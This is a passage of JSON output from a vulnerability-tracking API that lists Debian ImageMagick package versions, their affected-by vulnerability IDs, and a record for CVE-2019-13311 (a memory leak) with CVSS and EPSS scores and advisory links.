"VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13391" ], "risk_score": 1.8, "exploitability": "0.5", "weighted_severity": "3.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x998-fhs5-93ht" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82359?format=api", "vulnerability_id": "VCID-xnkt-e7mn-e7du", "summary": "ImageMagick: memory leaks at AcquireMagickMemory because of a wand/mogrify.c error", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13311.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13311.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00196", "scoring_system": "epss", "scoring_elements": "0.4136", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00196", "scoring_system": "epss", "scoring_elements": "0.41467", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42054", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42082", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.4202", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42072", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42084", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42106", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42069", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42044", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.42095", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00199", "scoring_system": "epss", "scoring_elements": "0.41993", "published_at": "2026-04-01T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730329", "reference_id": "1730329", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730329" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": 